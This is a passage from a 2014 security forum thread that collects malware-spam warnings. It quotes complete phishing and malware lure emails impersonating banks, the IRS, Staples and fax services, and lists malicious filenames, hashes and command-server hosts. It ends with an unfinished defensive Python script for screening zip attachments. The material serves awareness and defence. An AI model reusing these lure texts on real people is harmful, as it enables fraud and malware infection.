
Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  1. #351
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    More malicious "Voice Message from Unknown", jConnect Fax SPAM

    FYI...

    More malicious "Voice Message from Unknown" SPAM
    - http://blog.dynamoo.com/2014/01/more...nown-spam.html
    8 Jan 2014 - "Another bunch of fake "voice message" spams with a malicious payload are doing the rounds, for example:
    Subject: Voice Message from Unknown (996-743-6568)
    Subject: Voice Message from Unknown (433-358-8977)
    Subject: Voice Message from Unknown (357-973-7738)

    Body:
    - - -Original Message- - -
    From: 996-743-6568
    Sent: Wed, 8 Jan 2014 12:06:38 +0000
    To: [redacted]
    Subject: Important Message to All Employees


    Attached is a file VoiceMessage.zip which in turn contains VoiceMessage.exe which has a VirusTotal detection rate of 11/47*. Automated analysis tools... show an attempted connection to casbir .com .au on 67.22.142.68 (Cologlobal, Canada). This appears to be the only server on this IP address, so blocking or monitoring it for the time being may be prudent."
    * https://www.virustotal.com/en-gb/fil...is/1389191399/
    ___

    jConnect Fax Spam
    - http://threattrack.tumblr.com/post/7...nnect-fax-spam
    Jan 8, 2014 - "Subjects Seen:
    jConnect fax from “<phone number>” - 21 page(s), Caller-ID: <phone number>
    Typical e-mail details:
    Fax Message [Caller-ID: <phone number>]
    You have received a 21 page(s) fax at 2012-12-17 05:25:32 EST.
    * The reference number for this fax is lax3_did10-1514386087-4062628129-11.
    This message can be opened using your PDF reader. If you have not already installed j2 Messenger, download it for free: j2.com/downloads
    Please visit j2 .com/help if you have any questions regarding this message or your j2 service.
    Thank you for using jConnect!


    Malicious File Name and MD5:
    FAX_93-238738192_19.zip (3A8CAA5972CF72CCEB0C40531C28B5AB)
    FAX_93-238738192_19.exe (CA2628B955CAC2C8B6BD9F8C4C504FA4)


    Screenshot: https://31.media.tumblr.com/24541843...Lm51r6pupn.png

    Tagged: jconnect, Upatre
    ___

    LinkedIn Makes Federal Case Out of Fake Accounts
    - http://blogs.wsj.com/digits/2014/01/...fake-accounts/
    Jan 7, 2014 - "LinkedIn, the business-focused social network, charged in a federal civil lawsuit that 10 unnamed people had created thousands of fake accounts that can be used to pass on malicious computer code or puff up users’ profiles. In a suit filed Monday in U.S. District Court for the Northern District of California, LinkedIn said it had deleted the abusive accounts and traced them to an Amazon Web Services account. It’s asking the cloud computing giant to hand over the names of the owners of the web-services accounts. Amazon Web Services offers computing power for rent via the Internet. An Amazon spokeswoman did not immediately respond to a request for comment. LinkedIn accuses the unnamed people of violating its user agreement by creating multiple fake accounts that stole data from legitimate LinkedIn profiles through a method called scraping*..."
    * http://www.hotforsecurity.com/blog/l...tors-7594.html
    Jan 8, 2014 - "... In November, Bitdefender warned about fake LinkedIn profiles that gather personal details** and lead users to dangerous websites..."
    ** http://www.hotforsecurity.com/blog/a...fers-7362.html
    Nov 21, 2013 - "... As many users speak English and a native language, the scam aims at most countries in the world especially the US, where over 84 million users are active on LinkedIn. The fake recruiter spreads the link to the scam using URL shortening techniques. The bogus profile of “Annabella Erica” was already injected into authentic LinkedIn groups such as Global Jobs Network, which includes 167,000 users worldwide. Members of the social network are now sharing insights on more than 2.1 million groups, so the number of victims exposed to the scam could be a lot higher. The fake employment website is registered on a reputable “.com” domain to avoid raising doubts as to its authenticity. Scammers gather e-mail addresses and passwords they may later use for identity theft. Fraudsters usually register websites for longer periods and sometimes make their pages look even better than legitimate websites..."
    ___

    inTuit/TurboTax phish
    - http://security.intuit.com/alert.php?a=95
    1/7/14 - "Here is a copy of the phishing email people are receiving. Be sure -not- to open the attachment.

    TurboTax Alert: Your $4,120.55 Tax Refund!
    > http://security.intuit.com/images/ttphish.jpg
    Dear Customer,
    You've received a Tax Refund of $4,120.55.
    Kindly find attached file to view your Refund Confirmation from TurboTax.
    Please keep this refund confirmation for your records.
    NOTE: TurboTax/IRS will not request your banking details through email, sms or telephone.
    Thank you for using TurboTax


    This is the end of the -fake- email.
    Steps to Take Now:
    Do -not- open the email attachment...
    Delete the email."

    Last edited by AplusWebMaster; 2014-01-08 at 20:25.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #352
    Adviser Team AplusWebMaster's Avatar

    Fake Browser update site installs Malware

    FYI...

    Fake Browser update site installs Malware
    - http://www.symantec.com/connect/blog...stalls-malware
    9 Jan 2014 - "In the first week of 2014, we came across a website using tried and tested social engineering techniques to coerce victims into installing malware. The domain http ://newyear[REMOVED]fix .com, was registered on Dec 30, 2013. Based on our research, 94 percent of attacks appear to be targeting users based in the United Kingdom through advertising networks and free movie streaming and media sites... This particular social engineering attack is not novel, and plays on victims’ fear of needing to install urgent updates. Since the domain was registered only last week, it appears the attacker thought of this scheme at the very last minute, as the holiday season starts winding down. The website, which is hosted in the -Ukraine- uses a dual hybrid Web server setup by Apache and Nginx, with the latter identifying the victim’s browser and performing a redirect. The user will see the Google Chrome, Mozilla Firefox, and Microsoft Internet Explorer templates...
    Page displayed to Chrome users
    > http://www.symantec.com/connect/site...Update%201.png
    Page displayed to Firefox users
    > http://www.symantec.com/connect/site...Update%202.png
    Page displayed to Internet Explorer users
    > http://www.symantec.com/connect/site...Update%203.png
    JavaScript loop button which requires 100 clicks to close
    > http://www.symantec.com/connect/site...Update%204.png
    At the time of this blog post, the Internet Explorer version of the Web page is no longer functional. The Chrome download page serves up Chromeupdate.exe while the Firefox download page serves up Firefoxupdate.exe. Both of these samples are detected by Symantec as Trojan.Shylock*..."
    * http://www.symantec.com/security_res...092916-1617-99
    ___

    Spam Overdose Yields Fareit, Zeus and Cryptolocker
    - http://www.f-secure.com/weblog/archives/00002655.html
    Jan 9, 2014 - "... massive spam surge with the same subjects and attachments in our spam traps.
    >> http://www.f-secure.com/weblog/archives/emails.PNG
    >>> http://www.f-secure.com/weblog/archives/emailstats.png
    The binary attachment is a threat that is often referred to as Fareit. Fareit is known to steal information such as credentials and account information from installed FTP clients and cryptocurrency wallets, and stored passwords in browsers. For the two samples coming from this spam, we've seen them connecting to the following hosts to send information:
    • networksecurityx .hopto .org
    • 188.167.38.131
    • 94.136.131.2
    • 66.241.103.146
    • 37.9.50.200

    In addition to stealing data, these samples download other malware including Zeus P2P... Other malware seen installed in the system was Cryptolocker.
    > http://www.f-secure.com/weblog/archives/btc.PNG
    ... Samples are detected as Trojan.Pws.Tepfer and Trojan.GenericKD variants."

    - http://google.com/safebrowsing/diagn...ite=hopto.org/

    - https://www.virustotal.com/en/ip-add...1/information/

    - https://www.virustotal.com/en/ip-add...2/information/

    - https://www.virustotal.com/en/ip-add...6/information/

    - https://www.virustotal.com/en/ip-add...0/information/
    ___

    JPMorgan Chase SecureMail Spam
    - http://threattrack.tumblr.com/post/7...ecuremail-spam
    Jan 9, 2014 - "Subjects Seen:
    You have a new encrypted message from JPMorgan Chase & CO.
    Typical e-mail details:
    You have received a secure e-mail message from JPMorgan Chase & CO..
    We care about your privacy, JPMorgan Chase & CO. uses this secure way to exchange e-mails containing personal information.
    Read your secure message by opening the attachment. You will be prompted to save (download) it to your computer.
    If you have concerns about the validity of this message, please contact the sender directly.
    First time users - will need to register after opening the attachment.


    Malicious File Name and MD5:
    Secureinformation.zip (19CCB0B5FCF8D707671E5F98AC475D36)
    Secureinformation.exe (7F81501C468FF358DE1DA5B1F1AD150B)


    Screenshot: https://31.media.tumblr.com/84b205b1...loB1r6pupn.png

    Tagged: Chase, Upatre
    ___

    IRS Tax Return Spam
    - http://threattrack.tumblr.com/post/7...ax-return-spam
    Jan 9, 2014 - "Subjects Seen:
    IRS: Early 2013 Tax Return Report!
    Typical e-mail details:
    Dear Member
    Here is a report on your early 2013 Federal Tax return report. Kindly download the attachment to view your report and start filling for 2013 return as early as second week of December.
    Thanks
    Internal Revenue Service


    Malicious File Name and MD5:
    Early2013TaxReturnReport_D0E7937B80.zip (E76B91B9010AE7ABDC264380B95BF86D)
    Early2013TaxReturnReport_983456948574980572398456324965984573984509324.pdf.exe (FE20A23BEC91B7EC1E301B571CE91100)


    Screenshot: https://31.media.tumblr.com/a5c84027...RXE1r6pupn.png

    Tagged: IRS, Fareit
    ___

    - http://blog.mxlab.eu/2014/01/09/emai...ntains-trojan/

    - https://www.virustotal.com/en/file/b...8bd5/analysis/
    Early2013TaxReturnReport_ ...
    Analysis date: 2014-01-10 12:55:07 UTC

    - https://malwr.com/analysis/YzgyZWQzM...Y1OTU4MDdhODQ/

    Last edited by AplusWebMaster; 2014-01-10 at 14:36.

  3. #353
    Adviser Team AplusWebMaster's Avatar

    Fake Bank Statement SPAM ...

    FYI...

    Fake Bank Statement SPAM
    - http://threattrack.tumblr.com/post/7...statement-spam
    Jan 10, 2014 - "Subjects Seen:
    Bank Statement. Please read
    Typical e-mail details:
    Hello <email name>,
    I attached the December Invoice that contains the Property Tax and the other document showing the details mentioned below.
    I am at your disposal for any further question.
    Waiting for your instructions concerning the document attached.
    Goldie Oliver


    Malicious File Name and MD5:
    USBank_December_2013_17F9968085.zip (5A2E558A7DC17998A11A0FBFB34AACF9)
    USBank - December 2013_ID39485394562093456309847589346598237598320471237481923427583450.pdf.exe (2089EAC526883C98D67D399449B461DB)


    Screenshot: https://31.media.tumblr.com/66b87ad8...1p11r6pupn.png

    Tagged: Bank Statement, Fareit
    ___

    Junk Mail vs Scam Mail
    - http://www.bbb.org/blog/2014/01/junk-mail-vs-scam-mail/
    Jan 10, 2014 - "Many of the items sent to consumers' in-boxes these days are little more than junk mail. But BBB warns a growing number of spam emails are designed to inflict harm. While it may seem like this topic comes up frequently, unfortunately, scammers find a way to catch users off guard. Right after the Target store hacking of some 40 million credit and debit cards, BBB issued a warning* about emails claiming to be from Target but were disguised as malware designed to steal identity information. The warning was issued in light of all the scam emails on the internet right now. The hard part is telling the difference between a legitimate email from a vendor you do subscribe to and one that looks like the vendor but isn’t... Check for misspellings and grammatical errors. Silly mistakes and sloppy copy – for example, an area code that doesn’t match an address – often are giveaways that the site is a scam. Messaging like, “Just tell us where to send this $1,100” -or- “a delivery was cancelled because of problems with the mailing addressed and to please provide a correct address” is another giveaway. Companies typically do not use this type of language. A recent trend in scam emails is asking users to select a link on a state where they are to send the money or to send the correct address. This link will then lead to a site where a thief will use the information for their own use. It isn’t wise to select the links or open attachments in emails you aren’t familiar with, especially ones you haven’t solicited. When in doubt, check with the company before you respond to any website that asks you to enter personal identifying information. Bottom line, unless you’ve done business with the company or are on a mailing list with them – do -not- click on email links even if they appear to be from legitimate companies. Far too many times these days, it’s all just a scam."
    * http://www.bbb.org/blog/2014/01/watc...t-data-breach/
    ___

    Google linking of social network contacts to email raises concerns
    - http://www.reuters.com/article/2014/...A081NH20140110
    Jan 9, 2014 - "A new feature in Google Inc's Gmail will result in some users receiving messages from people with whom they have not shared their email addresses, raising concerns among some privacy advocates. The change, which Google announced on Thursday, broadens the list of contacts available to Gmail users so it includes both the email addresses of their existing contacts, as well as the names of people on the Google+ social network. As a result, a person can send an email directly to friends, and strangers, who use Google+. Google is increasingly trying to integrate its Google+, a two-and-a-half-year old social network that has 540 million active users, with its other services. When consumers sign up for Gmail, the company's Web-based email service, they are now automatically given a Google+ account. Google said the new feature will make it easier for people who use both services to communicate with their friends... Some privacy advocates said Google should have made the new feature "opt-in," meaning that users should explicitly agree to receive messages from other Google+ users, rather than being required to manually change the setting... A Google spokeswoman said the company planned to send an email to all Google+ users during the next two days alerting them to the change and explaining how to change their settings..."

    Last edited by AplusWebMaster; 2014-01-10 at 22:53.

  4. #354
    Adviser Team AplusWebMaster's Avatar

    Sefnit-added Tor service...

    FYI...

    Sefnit-added Tor service ...
    - https://net-security.org/malware_news.php?id=2673
    Jan 10, 2014 - "... the Sefnit click-fraud Trojan... has been around since 2009... This rapid rise in Tor connections has served to see just how many computers were infected with the malware, and the number was staggering: over four million. Since then, Microsoft has been working to diminish that number... Microsoft has decided to retroactively clean the machines that still had the Sefnit-added Tor service, and practically managed to do so for half of them - around 2 million - in just two months...
    > http://www.net-security.org/images/a...012014-big.jpg
    ... two million cleaned computers is better than none, two million more remain at risk... In order to help these users, Microsoft has compiled a short step-by-step guide* on how to do it..."
    * http://blogs.technet.com/b/mmpc/arch...or-hazard.aspx
    9 Jan 2014


  5. #355
    Adviser Team AplusWebMaster's Avatar

    Fake Dept. of Treasury SPAM ...

    FYI...

    Fake Dept. of Treasury SPAM
    - http://blog.dynamoo.com/2014/01/depa...notice-of.html
    13 Jan 2014 - "This US Treasury spam (but apparently sent from salesforce .com) has a malicious attachment:
    Date: Mon, 13 Jan 2014 18:54:16 +0700 [06:54:16 EST]
    From: "support@salesforce .com" [support@salesforce .com]
    Subject: Department of Treasury Notice of Outstanding Obligation - Case H6SYVMK704BX4AL
    Important please review and sign the attached document!
    We have received notification from the Department of the Treasury,
    Financial Management Service (FMS) that you have an outstanding
    obligation with the Federal Government that requires your immediate
    attention.
    In order to ensure this condition does not affect any planned
    contract or grant activity, please review and sign the attached document and if
    you are unable to understand the attached document please call FMS at 1-800-304-3107
    to address this issue. Please make sure the person making the telephone call has the
    Taxpayer Identification Number available AND has the authority/knowledge
    to discuss the debt for the contractor/grantee.
    Questions should be directed to the Federal Service Desk ...


    Attached is a file FMS-Case-H6SYVMK704BX4AL.zip (VirusTotal detection rate 7/47*) which in turn contains a malicious executable FMS-Case-{_Case_DIG}.exe (detection rate also 7/47**)... analysis shows an attempted connection to anggun.my .id on 38.99.253.234 (Cogent, US). This seems to be the only domain on that server, blocking either may be prudent."
    * https://www.virustotal.com/en-gb/fil...is/1389622089/

    ** https://www.virustotal.com/en-gb/fil...is/1389622087/
    ___

    Threat Outbreak Alerts
    - http://tools.cisco.com/security/cent...utbreak.x?i=77
    Fake Financial Tips Attachment Email Messages - 2014 Jan 13
    Fake Account Payment Information Email Messages - 2014 Jan 13
    Fake Court Appearance Request Email Messages - 2014 Jan 13
    Fake Product Catalog Email Messages - 2014 Jan 13
    Fake Company Complaint Email Messages - 2014 Jan 13
    Fake Bank Account Statement Email Messages - 2014 Jan 13
    Fake Package Tracking Information Email Messages - 2014 Jan 13
    Fake Payroll Invoice Email Messages - 2014 Jan 13
    Fake Bank Payment Notification Email Messages - 2014 Jan 13
    Fake Invoice Statement Attachment Email Messages - 2014 Jan 13
    (More detail and links at the cisco URL above.)

    Last edited by AplusWebMaster; 2014-01-14 at 01:12.

  6. #356
    Adviser Team AplusWebMaster's Avatar

    Fake HSBC SPAM, Unsolicited SPAM, More WhatsApp Message Spam

    FYI...

    Fake HSBC SPAM / Payment Advice.exe
    - http://blog.dynamoo.com/2014/01/hsbc...m-payment.html
    14 Jan 2014 - "This -fake- HSBC spam comes with a malicious attachment:
    Date: Tue, 14 Jan 2014 11:57:29 -0300 [09:57:29 EST]
    From: HSBC Advising Service [advising.service.738805677.728003.693090157@ mail.hsbcnet.hsbc .com]
    Subject: Payment Advice - Advice Ref:[G72282154558] / Priority payment / Customer Ref:[63 434S632U9I]
    Sir/Madam
    The attached payment advice is issued at the request of our customer. The advice is for your reference only.
    Yours faithfully
    Global Payments and Cash Management
    HSBC ...


    There is an attachment Payment Advice [G72282154558].zip which contains an executable Payment Advice.exe with a VirusTotal detection rate of 12/48*. Automated analysis... shows an attempted connection to thebostonshaker .com on 206.190.147.139 (Salt Lake City Hosting, US). It is the only site on this IP address, blocking either temporarily may give some protection."
    * https://www.virustotal.com/en-gb/fil...is/1389713473/
    ___

    Unsolicited SPAM...
    - http://blog.dynamoo.com/2014/01/unce...to-adware.html
    14 Jan 2014 - "... plagued with these over the past few days, emails coming in with the following subjects:
    Underground XXX files
    Free porno torrents
    Uncensored download

    The body text contains just a link to [donotclick]goinst .com/download/getfile/1205000/0/?q=Uncensored%20download
    In turn this downloads a file Uncensored download__3516_i263089565_il6090765.exe and of course that's about as trustworthy as a van with "FREE CANDY" ... A quick look at the EXE in VirusTotal* indicates that it's some sort of Adware, probably pay-per-install. An examination of the binary shows a digital signature for Shetef Solutions & Consulting (1998) Ltd who are probably -not- behind the spam run, but are probably inadvertently paying the spammers for installations. Avoid."
    * https://www.virustotal.com/en-gb/fil...is/1389715495/
    ___

    More WhatsApp Message Spam
    - http://threattrack.tumblr.com/post/7...p-message-spam
    Jan 14, 2014 - "Subjects Seen:
    Missed voice message, “4:27”PM
    Typical e-mail details:
    New voicemessage.
    Please download attached file
    Description
    Jan 09 2:44PM PM
    08 seconds


    Malicious File Name and MD5:
    Missed-message.zip (687C8BE7F4A56A00AF03ED9DFC3BFB76)
    Missed-message.exe (BF1411F18EA12E058BFB05692E422216)


    Screenshot: https://gs1.wac.edgecastcdn.net/8019...KF81r6pupn.png

    Tagged: WhatsApp, Upatre
    ___

    Fake ADP invoice w/ Fiserv document - TROJAN
    - http://blog.mxlab.eu/2014/01/14/genv...serv-document/
    Jan 14, 2014 - "... intercepting different types of emails with an attached Gen:Variant.Strictor.49180.
    > ADP Invoice - This email is sent from the spoofed address “payroll.invoices@ adp .com” while the SMTP from is “fraud@ aexp .com”, comes with the subject “Invoice #3164342” and has the following body:
    Attached is the invoice (Invoice_ADP_3164342.zip) received from your bank.
    Please print this label and fill in the requested information. Once you have filled out
    all the information on the form please send it to payroll.invoices@ adp. com.
    For more details please see the attached file.
    Please do not reply to this e-mail, it is an unmonitored mailbox!
    Thank you ,
    Automatic Data Processing, Inc...

    The attached ZIP file has the name Invoice_ADP_3164342.zip and contains the 19 kB file Invoice_ADP_01142014.exe.

    > Fiserv attached document - This email is sent from the spoofed address “Fiserv <Debra_Drake@ fiserv .com>” while the SMTP from is “fraud@ aexp .com”, comes with the subject “FW: Scanned Document Attached” and has the following body:
    Dear Business Associate:
    Protecting the privacy and security of client, company, and employee
    information is one of our highest priorities. That is why Fiserv has
    introduced the Fiserv Secure E-mail Message Center – a protected e-mail
    environment designed to keep sensitive and confidential information
    safe. In this new environment, Fiserv will be able to send e-mail
    messages that you retrieve on a secured encrypted file.
    You have an important message from Debra_Drake@ fiserv .com. To see your message, use the following password to decrypt attached file: JkSIbsJPPai
    If this is your first time receiving a secure file from the
    Fiserv Secure E-mail Message Center, you will be prompted to set up a
    user name and password... If you have any questions, please contact your Fiserv representative...

    The attached ZIP file has the name FSEMC.Debra_Drake.zip and contains the 19 kB file FSEMC_01142014.exe. The trojan is known as Gen:Variant.Strictor.49180 by most of the virus engines but also as PWSZbot-FMO!5B171D420618, Heuristic.LooksLike.Win32.Suspicious.J!81, TrojanDownloader:Win32/Upatre.A or PE:Malware.FakePDF@CV!1.9C28. At the time of writing, 12 of the 48 AV engines detected the trojan at VirusTotal*..."
    * https://www.virustotal.com/en/file/8...bb92/analysis/

    - https://malwr.com/analysis/ZTNjMzM4Y...UyNmJjOTEyZDg/

    - https://www.virustotal.com/en-gb/ip-...2/information/

    - https://www.virustotal.com/en-gb/ip-...5/information/
    ___

    Fake Quickbooks Invoice - Trojan.Zbot ...
    - http://blog.mxlab.eu/2014/01/14/troj...mportant-docs/
    Jan 14, 2014 - "... intercepting different types of emails with an attached Trojan.Zbot.IDE.
    > Quickbooks Invoice: This email is sent from the spoofed address “QuickBooks Invoice <auto-invoice@ quickbooks .com>” while the SMTP from is “fraud@ aexp .com”, has the subject “Notification of direct debit of fees” and has the following body:
    Notification Number: 5430143
    Mandate Number: 8396466
    ###THIS IS AN AUTO NOTIFICATION EMAIL. DO NOT REPLY TO THE SENDER OF THIS EMAIL. IF YOU HAVE A QUERY PLEASE REFER TO THE INFORMATION BELOW ###
    This is notification that Land Registry will debit 214.00 GBP from your nominated account on or as soon as possible before 15/01/2013.
    Details of fees that we shall be collecting by direct debit for the applications charged are now available to view.
    You can access these by opening attached report.
    If you have an enquiry relating to your VDD account please contact Customer Support at customersupport@ landregistry .gsi .gov .uk or call on 0844 892 1111. For all enquiries, please quote your key number.
    Thank you,
    Land Registry ...

    The attached ZIP file has the name Notification_5430143.zip and contains the 19 kB file Notification_1401.exe.
    > Important Docs: This email is sent from the spoofed address “Elbert Hickman <xxxx@ rbs .co .uk>” while the SMTP from is “fraud@aexp .com”, has the subject “Important Docs” and has the following body:
    Check attached docs.
    Elbert Hickman
    Commercial Banking Support
    Thames Gateway Commercial Office
    2nd Floor, Riverbridge House, Anchor Boulevard,
    Crossways, Dartford, Kent DA2 6SL
    Depot Code 023
    Tel: 01322 639620
    Fax: 01322 606862
    email: Elbert@ rbs .co .uk ...

    The attached ZIP file has the name Docs_14012014.zip and contains the 19 kB file Docs_14012014.exe. The trojan is known as Trojan.Zbot.IDE, Trojan-Spy.Zbot, TR/Yarwi.B.117, W32/Trojan.TROM-4807 or Trojan.Email.FakeDoc. At the time of writing, 14 of the 48 AV engines detected the trojan at VirusTotal*."
    * https://www.virustotal.com/en/file/2...is/1389713323/

    - https://malwr.com/analysis/ZjM0MmVjY...BjYzE5OTY5ZmI/

    - https://www.virustotal.com/en-gb/ip-...7/information/

    - https://www.virustotal.com/en-gb/ip-...4/information/
    ___

    Fake PG&E SPAM
    - http://blog.dynamoo.com/2014/01/pg-g...ment-spam.html
    14 Jan 2014 - "This -fake- spam from the Pacific Gas & Electric company is presumably meant to have a malicious payload, but all I get is a server error..
    From: PG&E [do_not_reply@ sourcefort .com]
    Reply-To: PG&E [do_not_reply@ sourcefort .com]
    Date: 14 January 2014 22:37
    Subject: Gas and Electric Usage Statement
    PG & E ENERGY STATEMENT Account No: 718198305-5
    Statement Date: 01/10/2014
    Due Date: 02/01/2014
    Your Account Summary
    Amount Due on Previous Statement $344.70
    Payment(s) Recieved Since Last Statement 0.0
    Previous Unpaid Balance $344.70
    Current Electric Charges $165.80
    Current Gas Charges 49.20
    Total Amount Due BY 02/01/2014 $559.7
    To view your most recent statement, please click here You must log-in to your account or register for an online account to view your statement...


    Screenshot: http://2.bp.blogspot.com/-AhQr4bPPcj.../s1600/pge.png

    To give PG&E full credit, they have a link on their homepage about it and a full warning here*. These scam emails seem to have been doing the rounds for quite a few days now."
    * http://www.pgecurrents.com/2014/01/0...-emails-calls/

    Last edited by AplusWebMaster; 2014-01-15 at 04:34.

  7. #357
    Adviser Team AplusWebMaster's Avatar

    Fake Staples order, RBS pwd reset SPAM ...

    FYI...

    Fake Staples order SPAM...
    - http://blog.dynamoo.com/2014/01/stap...-awaiting.html
    15 Jan 2014 - "This -fake- Staples spam has a malicious attachment:
    Date: Wed, 15 Jan 2014 15:40:44 +0800 [02:40:44 EST]
    From: Staples Advantage Orders [Order@ staplesadvantage .com]
    Subject: Your order is awaiting verification!
    Order Status: Awaiting verification
    Order #: 5079728
    Your order has been submitted and is awaiting verification from you.
    Order #: 5079728
    Order Date and Eastern Time: 2/19/2013 12:28 PM
    Order Total: $152.46
    This is potentially due to missing or invalid order or payment information. If you receive this status message, please call Customer Service immediately for assistance....


    Screenshot: https://lh3.ggpht.com/--iaCgzY9eyg/U...0/staples2.png

    Attached is a ZIP file Order_5079728.zip which in turn contains a malicious executable Order_{_partorderb}.exe which has a VirusTotal detection rate of 23/47*. The Malwr report is pretty inconclusive, so presumably the binary is hardened against automated analysis tools."
    * https://www.virustotal.com/en-gb/fil...is/1389799070/

    - http://threattrack.tumblr.com/post/7...ification-spam
    Jan 15, 2014 - "Subjects Seen:
    Your order is awaiting verification!
    Typical e-mail details:
    Your order has been submitted and is awaiting verification from you.
    Order #: 1178687
    Order Date and Eastern Time: 2/19/2013 12:28 PM
    Order Total: $271.74
    This is potentially due to missing or invalid order or payment information. If you receive this status message, please call Customer Service immediately for assistance...


    Malicious File Name and MD5:
    Order_1178687.zip (312C682B547215FB1462C7C46646A1B7)
    Order_{_partorderb}.exe (1D85D2CC51AC6E1A2805366BB910EF70)


    Screenshot: https://gs1.wac.edgecastcdn.net/8019...JYM1r6pupn.png

    Tagged: Staples, Upatre
    ___

    Fake RBS pwd reset SPAM – PDF malware
    - http://myonlinesecurity.co.uk/rbs-ba...e-pdf-malware/
    15 Jan 2014 - "... another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Of course the RBS Bankline Password Reset Form is not from RBS or any other bank. Once the scammers and malware purveyors find a new or different scam they will use every bank they can to try to infect as many users as they can. Normally when you see an attachment or email with a subject like RBS Bankline Password Reset Form, you automatically think that it is another phishing attempt. In this case it is not phishing but a very nasty malware/virus/trojan. Almost all of these have a password stealing component, with the aim of stealing your email or FTP (web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details.
    Please find the Re-activation form attached, send one per user ensuring only one box is selected in section 3. A signatory on the bank mandate must sign the form. Fax to 0845 878 9791 or alternatively email a scanned copy of the form to banklineadministration@ rbs .co .uk, on receipt of the completed form we will respond to the request within 2 working hours and communicate this to the user by email. <<RBS_Bankline_Password_Reactivation.pdf>> Please note – The life-span of an activation code is 21 days; after this time, the activation code will expire and a new one must be ordered. Please be aware when choosing a new pin and password for the service, it is important not to use pin/passwords that you have used before but to use completely different details. If you are the sole Administrator may I take this opportunity to suggest when you are reinstated on the system, to set up another User in an Administrator role. This will prevent you being locked out completely and allow you to order a new activation code from within the system and reset your security sooner. If you require any further assistance then please do not hesitate to contact us...
    Regards
    Bankline Product Support ...


    RBS_Bankline_Password_Reactivation.zip extracts to RBS_Bankline_Password_Reactivation.exe. Current VirusTotal detections: 2/48*. MALWR Auto Analysis**... This is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions” enabled, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
    * https://www.virustotal.com/en/file/e...3e0c/analysis/

    ** https://malwr.com/analysis/YmYyYjIzM...FjMTE5MTA1NGM/

    38.102.226.94
    - https://www.virustotal.com/en-gb/ip-...4/information/

    - http://google.com/safebrowsing/diagnostic?site=AS:174
    ___

    Compromised Sites pull Fake Flash Player from SkyDrive
    - http://www.f-secure.com/weblog/archives/00002659.html
    Jan 15, 2014 - "On most days, our WorldMap* shows more of the same thing. Today is an exception... One infection is topping so high in the charts that it pretty much captured our attention. Checking the recent history of this threat, we saw that these past few days, it has been increasing in infection hits... It wasn't long before we saw that a lot of scripts hosted in various websites got compromised. Our telemetry actually showed that almost 40% of the infected websites were hosted in Germany. In those sites, malicious code has been appended to the scripts... Successful redirection leads to a fake flash download site that looks similar to these pages:
    > http://www.f-secure.com/weblog/archives/5_flash1.PNG
    ... The user would have to manually click on the Download Now link before a file called flashplayer.exe could be downloaded from a certain SkyDrive account. When the malicious flashplayer.exe is executed, this message is displayed to the user.
    > http://www.f-secure.com/weblog/archives/7_dialog.PNG
    While in the background, it is once again connecting to the same SkyDrive account in order to download another malware... Initial analysis showed that the sample is connecting to these locations.
    > http://www.f-secure.com/weblog/archives/9_post.PNG ..."

    * http://worldmap3.f-secure.com/

    - https://www.virustotal.com/en-gb/ip-...5/information/

    - https://www.virustotal.com/en-gb/ip-...9/information/

    Last edited by AplusWebMaster; 2014-01-16 at 00:21.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .
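    The post above turns on one check: what is actually inside the .zip, regardless of the icon or the name the e-mail promises. The same trick (a Windows executable with a PDF icon inside a .zip) recurs in the other lures in this thread. Below is an added example of a mail-gateway style triage script; it is not code from myonlinesecurity or from the malware author. It uses only the Python standard library, classifies each archive member by its leading bytes rather than its name, and flags executable extensions, double extensions such as ".jpg.scr", and document extensions sitting on top of PE content. The RBS filename is the one named in the post; every other entry and all file contents are constructed for the demonstration.

```python
"""Triage a mail attachment archive for the ".zip -> .exe with a PDF icon" lure.

Added example; standard library only. The RBS filename is the one named in the
post; the other entries and all byte contents are constructed.
"""
import io
import zipfile
from typing import Dict, List

# Extensions Windows runs directly. An attachment ending in one of these is a
# "block" no matter what its icon or the e-mail says it is.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
                   ".vbs", ".vbe", ".wsf", ".hta", ".msi"}
# Extensions a user expects to be harmless; used to spot "Invoice.pdf.exe".
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".jpeg", ".png",
                 ".gif", ".txt"}
# Leading bytes of the formats we recognise. "MZ" is a Windows PE whatever the
# filename says; a real PDF starts with "%PDF".
MAGIC = [(b"MZ", "pe"), (b"%PDF", "pdf"), (b"\xd0\xcf\x11\xe0", "ole2"),
         (b"PK\x03\x04", "zip"), (b"\xff\xd8\xff", "jpeg"), (b"\x89PNG", "png")]
# What content a given document extension should carry (docx/xlsx are zip containers).
EXPECTED = {".pdf": {"pdf"}, ".doc": {"ole2"}, ".xls": {"ole2"}, ".docx": {"zip"},
            ".xlsx": {"zip"}, ".jpg": {"jpeg"}, ".jpeg": {"jpeg"}, ".png": {"png"}}


def sniff(head: bytes) -> str:
    """Classify content by magic bytes, ignoring the filename entirely."""
    for magic, label in MAGIC:
        if head.startswith(magic):
            return label
    return "unknown"


def triage_zip(archive: bytes) -> List[Dict]:
    """Return one finding per archive member: name, sniffed kind, verdict, reasons."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            base = info.filename.rsplit("/", 1)[-1]
            exts = ["." + p.lower() for p in base.split(".")[1:]]
            final_ext = exts[-1] if exts else ""
            with zf.open(info) as fh:
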